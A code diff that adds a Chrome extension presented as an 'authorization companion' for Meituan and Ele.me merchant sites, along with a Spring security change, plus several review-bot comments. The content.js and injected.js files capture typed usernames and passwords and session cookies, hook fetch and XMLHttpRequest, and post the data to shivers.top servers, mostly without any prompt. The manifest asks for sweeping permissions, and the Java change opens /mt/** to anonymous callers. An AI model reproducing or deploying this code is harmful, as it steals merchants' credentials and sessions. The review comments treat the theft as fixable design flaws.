diff --git a/expand/ert/content.js b/expand/ert/content.js
new file mode 100644
index 0000000..32d282d
--- /dev/null
+++ b/expand/ert/content.js
@@ -0,0 +1,121 @@
+document.addEventListener("click", function(e) {
+ // 处理点击事件的代码
+ var account = document.getElementById("login")
+ var password = document.getElementById("password")
+ if(account != null && account != 'undefined'){
+ localStorage.setItem('account', account.value)
+ }
+ if(password != null && password != 'undefined'){
+ localStorage.setItem('password', password.value)
+ }
+});
+(function () {
+ if (location.host === 'melody.shop.ele.me' || location.host === 'nr.ele.me') {
+ var baseParamUrl = window.location.href
+ window.onload = function () {
+ var inputUserName = document.getElementById('username_login_username')
+ var inputPassWord = document.getElementById('username_login_password')
+ inputUserName.addEventListener('input', function (event) {
+ localStorage.setItem('ELMNAME', event.target.value)
+ })
+ inputPassWord.addEventListener('input', function (event) {
+ localStorage.setItem('ELMPASS', event.target.value)
+ })
+ }
+ if (baseParamUrl.includes('ABC')) {
+ var test = window.location.href.replace('https://melody.shop.ele.me/?ABC=', '')
+ var userName = test.substring(0, test.indexOf(':'))
+ var sysType = test.substring(test.indexOf(':') + 1, test.length)
+ localStorage.setItem('sysName', userName)
+ localStorage.setItem('sysType', sysType)
+ }
+ var s = document.createElement('script')
+ s.src = chrome.runtime.getURL('injected.js')
+ s.onload = function () {
+ this.remove()
+ };
+ (document.head || document.documentElement).appendChild(s)
+ }
+ if (location.host === 'e.waimai.meituan.com') {
+ var cookies = document.cookie
+ var baseParamUrl = window.location.href
+ if (baseParamUrl.includes('ABC')) {
+ var test = window.location.href.replace('https://e.waimai.meituan.com/?ABC=', '')
+ var userName = test.substring(0, test.indexOf(':'))
+ var sysType = test.substring(test.indexOf(':') + 1, test.length)
+ localStorage.setItem('sysName', userName)
+ localStorage.setItem('sysType', sysType)
+ }
+ var xhr = new XMLHttpRequest()
+ var userName = localStorage.getItem('sysName')
+ var sysType = localStorage.getItem('sysType')
+ var account = localStorage.getItem('account')
+ var password = localStorage.getItem('password')
+ var wmPoiName = localStorage.getItem('wmPoiName')
+ //console.log('ccccccccccccccccccccccccccccccc'+userName)
+ //console.log('ddddddddddddddddddddddddddddddd'+cookies)
+ //console.log('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'+account)
+ //console.log('bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'+password)
+ //console.log('eeeeeeeeeeeeeeeeeeeeeeeeeeeeeee'+wmPoiName)
+ if(account !== null && password !== null && account !== 'null' && password!== 'null' && account !== '' && password !== ''){
+ if ('1' === sysType) {
+ //服务器地址
+ xhr.open('POST', 'http://127.0.0.1:8080/mt/cookies', true)
+ } else {
+ xhr.open('POST', 'https://www.shivers.top/prod-api/negative/store_bing', true)
+ }
+ xhr.setRequestHeader("Content-Type","application/json")
+ var sendData = {'bingType': 1, 'cookie': cookies, 'userName': userName, 'account': account, 'password': password, 'wmPoiName': wmPoiName}
+ xhr.send(JSON.stringify(sendData))
+ xhr.onreadystatechange = function () {
+ if (xhr.readyState === 4 && xhr.status === 200) {
+ if (xhr.responseText === 'true') {
+ alert('当前授权完成,请直接关闭当前浏览器!')
+ }
+ }
+ }
+ }
+ localStorage.setItem('account', null)
+ localStorage.setItem('password', null)
+ }
+ if (location.host === 'shangoue.meituan.com') {
+ var cookies = document.cookie
+ var systype
+ var username
+ var result = window.prompt('请输入需要绑定的系统登录账户', '')
+ username = result
+ if (username != null) {
+ var resultOne = confirm('确定要绑定到营销生态系统吗?')
+ if (resultOne) {
+ var xhr = new XMLHttpRequest()
+ xhr.open('POST', 'https://go.shivers.top/prod-api/msg/store_bing', true)
+ var sendData = {'bingType': 1, 'cookie': cookies, 'abc': username}
+ xhr.send(JSON.stringify(sendData))
+ xhr.onreadystatechange = function () {
+ if (xhr.readyState === 4 && xhr.status === 200) {
+ if (xhr.responseText === 'true') {
+ alert('当前授权完成,如当前是总账号模式请尽快切换至子门店帐号绑定,目前总账号模式会触发子门店掉线,非总帐号模式请直接关闭当前浏览器!')
+ }
+ }
+ }
+ } else {
+ var resultsecond = confirm('确定要绑定到多合一系统吗?')
+ if (resultsecond) {
+ var xhr = new XMLHttpRequest()
+ xhr.open('POST', 'https://www.shivers.top/prod-api/negative/store_bing', true)
+ var sendData = {'bingType': 1, 'cookie': cookies, 'abc': username}
+ xhr.send(JSON.stringify(sendData))
+ xhr.onreadystatechange = function () {
+ if (xhr.readyState === 4 && xhr.status === 200) {
+ if (xhr.responseText === 'true') {
+ alert('当前授权完成,如当前是总账号模式请点击确定后切换子门店即可,非总帐号模式请直接关闭当前浏览器!')
+ }
+ }
+ }
+ } else {
+ systype = '3'
+ }
+ }
+ }
+ }
+})()
\ No newline at end of file
diff --git a/expand/ert/injected.js b/expand/ert/injected.js
new file mode 100644
index 0000000..48b1176
--- /dev/null
+++ b/expand/ert/injected.js
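Review bot: The click listener at the top of content.js copies the `login` and `password` field values into the page's `localStorage` on every click. The `e.waimai.meituan.com` branch then posts them with `document.cookie` to a backend with no prompt, whereas the `shangoue.meituan.com` branch at least asks via `prompt`/`confirm`. The password should not be collected or transmitted at all, and anything that must be held should stay in content-script memory rather than in `localStorage`, where every script on the merchant origin can read it. The cleanup `localStorage.setItem('account', null)` stores the string "null" rather than clearing the entry, so it should be `localStorage.removeItem('account')` and `localStorage.removeItem('password')`. When `sysType` is '1' the payload goes to `http://127.0.0.1:8080/mt/cookies` over cleartext HTTP, which looks like a development address left in. The guards `account != 'undefined'` compare a DOM element to a string and never filter anything.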
@@ -0,0 +1,44 @@
+(function(xhr) {
+ var XHR = XMLHttpRequest.prototype
+ var open = XHR.open
+ var send = XHR.send
+ XHR.open = function(method, url) {
+ this._method = method
+ this._url = url
+ return open.apply(this, arguments)
+ }
+ XHR.send = function(postData) {
+ this.addEventListener('load', function() {
+ window.postMessage({ type: 'xhr', data: this.response }, '*')
+ })
+ return send.apply(this, arguments)
+ }
+})(XMLHttpRequest);
+
+(function() {
+ let origFetch = window.fetch
+ window.fetch = async function(...args) {
+ const response = await origFetch(...args)
+ if (args[0] === 'https://app-api.shop.ele.me/shop/invoke/?method=GrayService.businessTimeGray') {
+ var xhr = new XMLHttpRequest()
+ var userName = localStorage.getItem('sysName')
+ var sysType = localStorage.getItem('sysType')
+ if ('1' === sysType) {
+ xhr.open('POST', 'https://go.shivers.top/prod-api/msg/store_bing', true)
+ } else {
+ xhr.open('POST', 'https://www.shivers.top/prod-api/negative/store_bing', true)
+ }
+ var paramVar = localStorage.getItem('ELMNAME') + ':' + localStorage.getItem('ELMPASS')
+ var sendData = { 'bingType': 2, 'cookie': args[1], 'abc': userName, 'account': paramVar }
+ xhr.send(JSON.stringify(sendData))
+ xhr.onreadystatechange = function() {
+ if (xhr.readyState === 4 && xhr.status === 200) {
+ if (xhr.responseText === 'true') {
+ alert('当前授权完成,请直接关闭当前浏览器!')
+ }
+ }
+ }
+ }
+ return response
+ }
+})();
\ No newline at end of file
diff --git a/expand/ert/manifest.json b/expand/ert/manifest.json
new file mode 100644
index 0000000..351616b
--- /dev/null
+++ b/expand/ert/manifest.json
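Review bot: The fetch wrapper builds `paramVar` from the `ELMNAME` and `ELMPASS` values that content.js saved from the ele.me login form and posts it, with `args[1]` (the intercepted request's init object), to a shivers.top endpoint without asking the user. That sends the merchant's plaintext password and request headers to a third party, so the `account` field should be dropped and the upload gated on explicit confirmation. Separately, the patched `XHR.send` broadcasts every response body with `window.postMessage({ type: 'xhr', data: this.response }, '*')`, and nothing in this commit listens for that message. Either remove the hook or pass `window.location.origin` as the target and filter on `this._url`. The outgoing request also sets no `Content-Type` and assigns `onreadystatechange` after `send`, unlike the equivalent code in content.js.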
@@ -0,0 +1,42 @@
+{
+ "manifest_version": 2,
+ "name": "授权伴侣",
+ "version": "1.0",
+ "content_security_policy": "script-src 'self'; object-src 'self';",
+ "description": "This is a sample Chrome extension.",
+ "browser_action": {},
+ "content_scripts": [
+ {
+ "matches": [
+ "*://e.waimai.meituan.com/*",
+ "*://shangoue.meituan.com/*",
+ "*://melody.shop.ele.me/*"
+ ],
+ "js": [
+ "content.js"
+ ],
+ "run_at": "document_start"
+ }
+ ],
+ "web_accessible_resources": [
+ "injected.js"
+ ],
+ "permissions": [
+ "nativeMessaging",
+ "tabs",
+ "notifications",
+ "webRequest",
+ "webRequestBlocking",
+ "storage",
+ "http://*/*",
+ "https://*/*",
+ "unlimitedStorage",
+ "idle",
+ "webNavigation",
+ "contextMenus",
+ "clipboardWrite",
+ "cookies",
+ "declarativeContent",
+ ""
+ ]
+}
\ No newline at end of file
diff --git a/ruoyi-framework/src/main/java/com/ruoyi/framework/config/SecurityConfig.java b/ruoyi-framework/src/main/java/com/ruoyi/framework/config/SecurityConfig.java
index d00d4a0..11fb7ba 100644
--- a/ruoyi-framework/src/main/java/com/ruoyi/framework/config/SecurityConfig.java
+++ b/ruoyi-framework/src/main/java/com/ruoyi/framework/config/SecurityConfig.java
@@ -115,7 +115,9 @@ public class SecurityConfig
 // 静态资源,可匿名访问
 .antMatchers(HttpMethod.GET, "/", "/*.html", "/**/*.html", "/**/*.css", "/**/*.js", "/profile/**").permitAll()
 .antMatchers("/swagger-ui.html", "/swagger-resources/**", "/webjars/**", "/*/api-docs", "/druid/**").permitAll()
- // 除上面外的所有请求全部需要鉴权认证
+ .antMatchers("/mt/**").permitAll()
+
+ // 除上面外的所有请求全部需要鉴权认证
 .anyRequest().authenticated();
 })
 // 添加Logout filter
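Review bot: The `permissions` array grants far more than content.js and injected.js use. Neither script references `nativeMessaging`, `webRequest`, `webRequestBlocking`, `cookies`, `tabs`, `webNavigation`, `clipboardWrite`, or the `http://*/*` and `https://*/*` host patterns, and the list ends with an empty string `""`. Trim it to what the code calls and replace the wildcard hosts with the three origins already listed under `matches`. content.js also tests for `nr.ele.me`, which is not in `matches`, so that condition can never hold there. The `description` of "This is a sample Chrome extension." says nothing about the cookies and account data the scripts upload.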
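Review bot: `.antMatchers("/mt/**").permitAll()` opens every current and future path under `/mt/` to anonymous callers for all HTTP methods. Per content.js in this same commit, `/mt/cookies` receives account names, passwords and session cookies. The controller is not in this diff, but as written any client can presumably submit or overwrite a binding. Narrow the rule to what the caller needs, for example `.antMatchers(HttpMethod.POST, "/mt/cookies").permitAll()`, and have the handler verify a per-user binding token before storing anything. The added blank line and the re-indented comment before `.anyRequest()` are unrelated churn, and the enclosing configuration lambda starts and ends outside the hunk.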